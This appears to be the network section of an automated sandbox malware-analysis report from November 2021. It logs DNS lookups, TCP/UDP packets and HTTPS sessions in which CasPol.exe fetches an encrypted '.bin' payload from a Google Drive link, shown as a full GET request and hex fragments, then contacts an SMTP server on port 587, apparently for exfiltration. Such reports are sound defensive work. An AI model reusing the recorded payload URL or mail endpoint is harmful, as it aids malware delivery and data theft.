Nov 22, 2021 14:07:59.161703110 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.161750078 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.161839962 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.161855936 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.161962986 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162019968 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162035942 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162067890 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162153959 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162170887 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162235022 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162250042 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162353039 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162370920 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162405014 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162416935 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162429094 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162533998 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162641048 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162669897 CET	443	49757	142.250.185.225	192.168.11.20
Nov 22, 2021 14:07:59.162676096 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:07:59.162779093 CET	49757	443	192.168.11.20	142.250.185.225
Nov 22, 2021 14:09:34.902055025 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:34.912699938 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:34.913000107 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:34.936005116 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:34.936625004 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:34.947549105 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:34.947845936 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:34.961469889 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:34.964241982 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:34.986630917 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:34.986696959 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:34.986738920 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:34.986972094 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:34.996015072 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:35.007277966 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:35.056723118 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:36.907689095 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:36.918257952 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:36.919363976 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:36.930121899 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:36.930531025 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:36.954018116 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:36.954596043 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:36.965162992 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:36.965540886 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:36.984733105 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:36.985158920 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:36.995805025 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:37.040616989 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:37.074626923 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:37.074754000 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:37.074803114 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:37.074812889 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:09:37.085175037 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:37.085283995 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:37.085297108 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:37.085407972 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:37.086369038 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:09:37.134350061 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:11:14.753604889 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:11:14.766602993 CET	587	49775	54.36.109.179	192.168.11.20
Nov 22, 2021 14:11:14.766855955 CET	49775	587	192.168.11.20	54.36.109.179
Nov 22, 2021 14:11:14.767241955 CET	49775	587	192.168.11.20	54.36.109.179

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:07:57.396970034 CET	64073	53	192.168.11.20	1.1.1.1
Nov 22, 2021 14:07:57.406194925 CET	53	64073	1.1.1.1	192.168.11.20
Nov 22, 2021 14:07:58.673113108 CET	63487	53	192.168.11.20	1.1.1.1
Nov 22, 2021 14:07:58.710369110 CET	53	63487	1.1.1.1	192.168.11.20
Nov 22, 2021 14:09:34.725507021 CET	60415	53	192.168.11.20	1.1.1.1
Nov 22, 2021 14:09:34.853038073 CET	53	60415	1.1.1.1	192.168.11.20
Nov 22, 2021 14:09:35.354351044 CET	51545	53	192.168.11.20	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 22, 2021 14:07:57.396970034 CET	192.168.11.20	1.1.1.1	0xb6c5	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:07:58.673113108 CET	192.168.11.20	1.1.1.1	0xba61	Standard query (0)	doc-0s-b8-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:09:34.725507021 CET	192.168.11.20	1.1.1.1	0x137	Standard query (0)	mail.neopyme.com	A (IP address)	IN (0x0001)
Nov 22, 2021 14:09:35.354351044 CET	192.168.11.20	1.1.1.1	0x681c	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 22, 2021 14:07:57.406194925 CET	1.1.1.1	192.168.11.20	0xb6c5	No error (0)	drive.google.com		142.250.185.110	A (IP address)	IN (0x0001)
Nov 22, 2021 14:07:58.710369110 CET	1.1.1.1	192.168.11.20	0xba61	No error (0)	doc-0s-b8-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:07:58.710369110 CET	1.1.1.1	192.168.11.20	0xba61	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.225	A (IP address)	IN (0x0001)
Nov 22, 2021 14:09:34.853038073 CET	1.1.1.1	192.168.11.20	0x137	No error (0)	mail.neopyme.com	neopyme.com		CNAME (Canonical name)	IN (0x0001)
Nov 22, 2021 14:09:34.853038073 CET	1.1.1.1	192.168.11.20	0x137	No error (0)	neopyme.com		54.36.109.179	A (IP address)	IN (0x0001)
Nov 22, 2021 14:09:35.364857912 CET	1.1.1.1	192.168.11.20	0x681c	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-0s-b8-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49755	142.250.185.110	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-22 13:07:57 UTC	0	OUT	GET /uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-11-22 13:07:58 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 22 Nov 2021 13:07:58 GMT Location: https://doc-0s-b8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrinn52haphefl414ecufsqsvklm/1637586450000/17803878832083720643/*/1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Content-Security-Policy: script-src 'nonce-NeupbpIHDLBOXzgooHtwaQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=Jt9ypumXDhAUm6D0hHJI6SknGy8Gzag3S0zGF4CsH_Ofkwkc9_KU6Eu83GQkfGPuondOfeBOz-cocMPeiAZhreGuMr4Z-Dmw39lHPWQ6NeLYDBMKDptUb8Edh7vsJlLR8t9AiEXXbm3LxgXmgjmAxFtxFR6MSuMCoPhcuIw3UZ4; expires=Tue, 24-May-2022 13:07:57 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-11-22 13:07:58 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 73 2d 62 38 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 63 62 71 76 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0s-b8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqv
2021-11-22 13:07:58 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49757	142.250.185.225	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-22 13:07:58 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrinn52haphefl414ecufsqsvklm/1637586450000/17803878832083720643/*/1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0s-b8-docs.googleusercontent.com Connection: Keep-Alive
2021-11-22 13:07:59 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdvAAidThCcr06xO9NBQ6RZKP5lFDiGankw4Ak0qJYOcMpfr58D1qE5mZ4o5PQ-wiQePzcK62lnkin0-b6JksIo Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="URCH_eOVsoJ130.bin";filename*=UTF-8''URCH_eOVsoJ130.bin Content-Length: 221760 Date: Mon, 22 Nov 2021 13:07:58 GMT Expires: Mon, 22 Nov 2021 13:07:58 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=aGt3GQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-11-22 13:07:59 UTC	6	IN	Data Raw: 33 69 0d 5b 23 db 4c cf 81 1c 0c ad 87 f9 a5 b2 65 bd 74 b0 e1 6f 71 c3 89 1c 4f 90 fa 35 3e 06 ca 38 c3 f3 96 68 43 8c 50 b1 0e 4f 53 26 03 e2 c1 fa 78 79 ea e6 62 50 4a c1 d0 b9 80 5d 4f 93 c5 1d da 4b ce 59 fc ad 50 b3 f7 07 bd af 46 f3 86 7d d9 6b df 3e ee 97 bb 6c 20 b2 ec 0b 3e ae 6c 2b b3 57 8c ad 9d c7 c8 0e 45 64 fc c3 d0 95 de 2c c9 50 94 f8 a8 81 fe dc 94 36 50 df 29 a8 8f ec 63 5a f3 d0 ce d7 7f a4 fc 90 32 66 7a d0 ed 3e 5f 63 4e d8 5d 98 f1 c7 b8 6d 45 67 e4 c5 38 5a 88 24 4a 45 b1 5b 3e c4 08 9c ef da 8f 10 3e d9 36 7a 49 c1 4f 16 6a 78 80 1c 8a 96 f0 e0 c0 9a 1d 04 f6 52 34 21 ef 41 b8 42 a9 2f 20 d2 a6 27 9e a1 f9 52 72 5f d0 82 6f 5a 6c f3 50 50 b0 89 aa ac 50 b4 37 81 aa 72 30 b4 ad f5 71 69 83 a2 9c 08 0a e5 38 d6 88 af 36 c7 4e d7 d5 Data Ascii: 3i[#LetoqO5>8hCPOS&xybPJ]OKYPF}k>l >l+WEd,P6P)cZ2fz>_cN]mEg8Z$JE[>>6zIOjxR4!AB/ 'Rr_oZlPPP7r0qi86N
2021-11-22 13:07:59 UTC	9	IN	Data Raw: 67 38 70 ee 65 7b bd 17 b3 ee 6e b5 ec ca d0 91 3f 89 bb a4 8a 18 af 58 1a 25 9e 67 58 db 75 10 e3 c0 c4 29 0e 0f 7a 97 ee 05 07 57 1f 9f de c1 8f 24 5e 99 e6 26 4a d4 18 a9 c5 4c 9c 4e d7 d8 34 65 ab 68 19 dc de 12 e8 ff 6f 7c 63 9f 91 93 79 f7 36 b1 4a 15 bb 1a e7 d4 5f 8c 25 64 ae ce 48 18 76 dd 4a 37 5c 0c 60 9a fb 50 17 ea 97 c2 7b a4 b7 55 15 6f 8b 54 70 1c e7 4f 18 bd b5 e3 7c 9a 4c 39 7e be d0 18 0f c5 60 9a 46 7f 19 18 4a ae e3 bb 8c f2 75 9f ee 9f 36 a0 e4 21 1e cd dc 30 24 30 8a a3 8b 85 a4 82 87 85 c7 33 ba 53 a4 b9 69 fe eb f7 82 90 16 d8 60 73 9d 8a dc 45 7d f8 8b 94 c5 96 71 1b c4 92 7d 17 4a 16 c5 dd d9 70 19 50 37 cd de c5 ee ae 06 27 00 69 1d 37 08 d5 21 f9 59 25 9f 9e 4f f0 4a 66 8f ac c4 68 a0 b7 45 70 c3 02 35 02 b5 8d 0d 16 53 01 0d Data Ascii: g8pe{n?X%gXu)zW$^&JLN4eho\|cy6J_%dHvJ7\`P{UoTpO\|L9~`FJu6!0$03Si`sE}q}JpP7'i7!Y%OJfhEp5S
2021-11-22 13:07:59 UTC	13	IN	Data Raw: 9a 52 12 1d b1 f3 8e b6 96 62 2d 07 91 5d 3d 19 94 78 20 fc da 79 63 b7 9e c5 26 72 12 09 e4 7d a0 2d 57 d7 ba 9e 3d b5 39 11 3b fb a0 81 8b 3e a8 19 c6 01 05 49 eb 38 13 43 b9 2d 3f 17 54 d4 5f 1b 1b 4b 1a c1 1b f6 59 e1 48 41 44 88 56 4e 54 d5 a7 fd 81 56 98 f2 3f a9 ad b9 0c 39 03 c0 6b df 3a c6 b3 fb 6c 2a 98 ec 0b 3e bd 5c 29 b3 5f 8d ad 9d cf c8 0e 54 72 f7 e8 cb 95 d9 3b 37 51 b8 fa b0 8a fe db 82 c8 d1 f3 2b bf 8a f3 de 4c 0d 65 eb 18 75 1e d6 3f d7 32 2c b8 82 4f 57 88 3c b7 30 c2 e6 a8 98 08 0c 92 8a aa 46 65 e0 cd 35 37 c4 34 36 36 66 bc a1 8a d6 bc 0c b6 52 1e 4f 57 42 1c 44 50 f7 1e 8a 90 d8 7b 90 df 17 2c c2 51 37 27 65 1f 30 23 a3 07 05 d2 a6 2d b6 3a 19 52 7a 76 9e 81 64 5c 44 30 53 50 ba a9 8c ac 50 be 1f 1a e4 04 39 ab a7 59 2e 69 83 a3 Data Ascii: Rb-]=x yc&r}-W=9;>I8C-?T_KYHADVNTV?9k:l*>\)_Tr;7Q+Leu?2,OW<0Fe57466fROWBDP{,Q7'e0#-:Rzvd\D0SPP9Y.i
2021-11-22 13:07:59 UTC	17	IN	Data Raw: 77 e6 a8 55 ea f2 13 e3 1d d8 90 f6 32 5e 05 7a 30 5f ac 91 00 b2 a9 cc b5 ec c6 63 89 35 81 9d 7c 8d 52 d0 6f 1a 2f 48 5c 5e f1 4d 16 e9 14 08 01 28 07 52 89 c7 2b 03 38 df 95 f6 f3 51 28 7c 70 e6 20 6a fc 20 a9 c4 6e 42 4e c4 d0 65 8b bd e7 1f b9 18 12 e8 f5 b3 73 1f b7 e4 08 79 f7 25 98 62 2d bb 1a ed 0a f2 30 2d 5e 7d ce 48 1f 02 2b 4f 37 41 d3 6f bf c6 67 17 fb 9f f9 18 8c 8f 5f 61 56 55 54 60 1e c9 95 52 bd b3 86 d5 d1 4c 33 aa b7 e2 5f 74 c5 60 9a 53 74 11 6e 4a ae 86 28 8c e3 77 b1 14 f0 78 a6 8b ed 18 d2 e4 81 64 15 a2 9e 8d ad e2 93 ab ab 90 63 ba 59 70 bf 50 bb c1 15 84 ff 41 b7 a6 79 9b ef 50 4a 58 da b7 93 b1 a6 62 36 ed c5 2e 17 40 c2 ed 82 d3 58 a2 46 1f e5 b1 03 e4 b8 4c 72 0f 4c 35 07 67 81 2b ea 7d 01 a0 f1 17 fa 94 6c 10 02 10 e5 8d 9f Data Ascii: wU2^z0_c5\|Ro/H\^M(R+8Q(\|p j nBNesy%b-0-^}H+O7Aog_aVUT`RL3_t`StnJ(wxdcYpPAyPJXb6.@XFLrL5g+}l
2021-11-22 13:07:59 UTC	18	IN	Data Raw: 03 73 5a a1 b6 f9 54 5f 46 f3 25 12 8e 6b df 34 32 86 fc 03 f2 b2 ec 01 51 67 6c 2b b9 4e b2 c0 9c c7 c8 70 4b 64 fc c7 c7 a6 e3 04 09 52 94 fe 80 ab fe dc 92 1e f8 df 29 ae 90 f4 b6 86 f3 64 cd 32 7a 1c fd d6 eb 51 06 8a 84 4d 79 35 e1 8d 3b ea 90 8f b0 39 24 09 80 b9 71 6e f9 46 42 0f c4 35 14 70 43 bd ab 95 a2 3e 53 b6 56 07 27 50 42 1c 4e 63 0d 09 8a 96 f1 f3 d0 ce 5d 12 92 9c 35 21 4b 26 21 63 be 51 37 d2 a6 23 b6 e4 1b 52 76 76 8c 81 64 5c 03 d3 53 50 ba 23 bb ec 48 9c 6f 83 e4 02 91 a5 ed cc 59 10 83 a2 96 1b 48 f7 3a a8 9e 8f 36 c3 66 af d5 c9 75 44 84 77 61 2e f3 3a 2e ec 57 3f ee 64 23 e6 71 3b 3c 0e b0 d2 d7 fa 69 4b d4 5d 71 7d 74 e3 62 ae 02 fa 84 14 a3 2a e4 39 4f 27 0e 70 eb ca 80 3e 83 d0 7b 5a b2 8d 0e 07 a1 47 69 03 9a 86 54 42 d0 b8 20 Data Ascii: sZT_F%k42Qgl+NpKdR)d2zQMy5;9$qnFB5pC>SV'PBNc]5!K&!cQ7#Rvvd\SP#HoYH:6fuDwa.:.W?d#q;<iK]q}tb*9O'p>{ZGiTB
2021-11-22 13:07:59 UTC	19	IN	Data Raw: 39 74 b8 e9 70 43 c5 6f 90 40 5f 23 56 4a af 8c f6 8c f2 42 9e f9 f0 76 a0 e4 2b 53 d5 ee 5f 64 30 8a a9 97 ad e8 81 87 83 a8 63 e0 54 ae bf 4f b3 e9 f7 ec f8 47 d8 6f 79 9b e5 94 45 7d f3 80 93 b1 ac 06 1c c5 fd 20 17 4a 1c 68 94 db 70 13 46 1f e3 c4 c5 e4 b9 46 ac 00 69 8c 37 67 81 2f f9 53 29 07 f6 17 f0 45 6c 38 bb 08 e5 8b b6 45 71 ce 01 83 1d c6 d4 03 16 59 12 b5 02 1a d0 b0 f6 0e 04 62 22 83 b5 c5 14 47 3b e4 9e b8 cb 4a 33 8d 06 b6 3c 6c e5 eb a3 d6 82 e6 5b 6f a8 70 2c 9a 80 a2 09 39 f9 84 24 18 fe d6 d3 e3 a1 51 25 a1 63 6b 91 81 05 5a 3d 82 a9 06 6a e1 e4 16 61 94 35 c9 6a 93 b7 2b 96 80 b4 32 a7 11 4f 88 36 7b 55 5a 6a 74 24 f6 5c 35 9a 03 2d c3 f0 bc cb ea 2e 38 5f b9 50 6e 86 5b 2e 25 72 1a cd 1a f7 a6 5c e7 06 3e 73 cd c4 b4 fe 20 b6 99 92 Data Ascii: 9tpCo@_#VJBv+S_d0cTOGoyE} JhpFFi7g/S)El8EqYb"G;J3<l[op,9$Q%ckZ=ja5j+2O6{UZjt$\5-.8_Pn[.%r\>s
2021-11-22 13:07:59 UTC	20	IN	Data Raw: 33 61 cf 54 2e 7f 61 8b 1c 8d 8d 0e e1 bc d7 35 2a b8 53 31 0b 51 8f 30 24 be d1 21 fe a4 3f 95 a1 1e 44 8e 5f f7 81 73 51 6c ac 4d ae b1 ad a8 87 55 8c 48 7e 1b fb 35 9e ad d5 62 59 81 a2 00 08 0a e5 5f d6 88 9e 20 d4 4a ed 56 c9 7f e6 95 26 7f 1a 6b 39 02 fe f2 41 c3 4c 58 ec 73 5e e4 69 b2 d8 e8 bd 41 4b d4 46 73 7e 1b 20 66 b7 f6 d3 78 13 b5 20 d6 04 49 27 19 1b 8b 34 81 18 a2 90 4a 5a b4 af 7f 1e b2 49 41 3c 9e 9b ac 9e 71 bd 37 bc 6c eb be d1 4f b2 22 4f 9e 84 ee 61 c8 8b 31 f3 68 39 aa 9e 42 e1 d5 21 61 e1 57 3f 9a ac 73 ee be da c3 b7 6a ec 25 56 b6 9d 78 17 42 ac a1 d5 ba 8d d6 7b 09 7d 39 3c 12 18 b5 10 b3 20 63 1e dc 73 31 8f a0 37 8b 7b ee ab 05 52 e5 86 c2 37 c3 aa e1 15 f1 3f 7a 30 7d 72 91 00 92 58 3b b5 ea ca 7f 91 34 81 91 b1 85 09 e2 58 Data Ascii: 3aT.a5*S1Q0$!?D_sQlMUH~5bY_ JV&k9ALXs^iAKFs~ fx I'4JZIA<q7lO"Oa1h9B!aW?sj%VxB{}9< cs17{R7?z0}rX;4X
2021-11-22 13:07:59 UTC	22	IN	Data Raw: 8b b3 e7 6e c3 0d 2d 12 d9 c4 f3 17 75 19 0e 1e 64 c9 bf f6 0a a6 67 33 8f b4 cd 08 b9 3a 03 8a be e3 80 31 8d 00 47 d2 6e e5 e2 cc ae 82 fc 51 65 b4 7c 2c 92 9f 43 f0 38 d5 9d 5a 10 fe 20 d0 9d b9 5e 25 a5 4b 55 91 81 0e da 35 82 a9 07 7d eb e8 18 69 8b 3a 24 63 bf b0 23 8c 86 16 37 b7 1d 4e 80 2f 85 54 54 71 72 0c 1b 5e 35 9c 1b c1 c1 f0 b5 a4 92 2e 22 55 b3 4b 62 86 53 38 e4 7b 36 cf 03 f9 a6 54 b5 1e c0 72 ee c6 9f fb 02 c5 67 6c 05 d0 ec e4 db 54 8e c1 4b 74 49 94 47 74 01 af d1 a2 6d ff 2b d7 8e cc b1 5b 01 13 de d7 8a a9 8a 96 f1 98 9a 23 20 3c bc 4b 0c b5 cf 62 72 9b 61 d4 22 64 ff 0c e8 76 ad 34 7f 35 c3 9e 3b 16 29 d2 43 fb b1 84 bc 39 56 18 e0 27 0c 57 fb 2a 32 ed 0e f5 81 a6 4e d6 47 0e 1f 35 1f d6 e5 fd 7c f3 5a 40 41 a0 06 4a 4b cb 7f fb db Data Ascii: n-udg3:1GnQe\|,C8Z ^%KU5}i:$c#7N/TTqr^5."UKbS8{6TrglTKtIGtm+[# <Kbra"dv45;)C9V'W*2NG5\|Z@AJK
